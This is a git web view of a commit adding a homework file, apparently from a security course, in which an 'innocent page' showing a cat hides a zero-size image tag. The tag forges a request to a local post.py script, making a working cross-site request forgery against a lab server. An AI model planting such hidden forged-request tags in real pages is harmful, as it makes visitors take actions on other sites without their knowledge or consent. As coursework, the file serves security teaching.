summaryrefslogtreecommitdiff
path: root/hw4/csrf.html
diff options
context:
space:
mode:
author53hornet <53hornet@gmail.com>2019-02-02 23:10:20 -0500
committer53hornet <53hornet@gmail.com>2019-02-02 23:10:20 -0500
commit24cd8bc11345395f1a0bb64d61e51e207d8b3ace (patch)
treeef8242cda1175c11dd4a565e1ba16cb531c11c47 /hw4/csrf.html
downloadcsci454-24cd8bc11345395f1a0bb64d61e51e207d8b3ace.tar.xz
csci454-24cd8bc11345395f1a0bb64d61e51e207d8b3ace.zip
Diffstat (limited to 'hw4/csrf.html')
-rw-r--r--hw4/csrf.html14
1 files changed, 14 insertions, 0 deletions
diff --git a/hw4/csrf.html b/hw4/csrf.html
new file mode 100644
index 0000000..3e8cdae
--- /dev/null
+++ b/hw4/csrf.html
@@ -0,0 +1,14 @@
+<html>
+<title> Innocent page </title>
+<body>
+<h2>This is innocent page, here is a picture of a cute cat: </h2> <br>
+
+<img src="cat.jpg">
+
+<!-- Insert your CSRF attack here. For example you can use another hidden <img> to
+generate an HTTP request to post.py to write something from victim -->
+
+<img src="http://127.0.0.1:8000/cgi-bin/post.py?message=i%20am%20not%20l33t" width="0" height="0" border="0">
+
+</body>
+</html>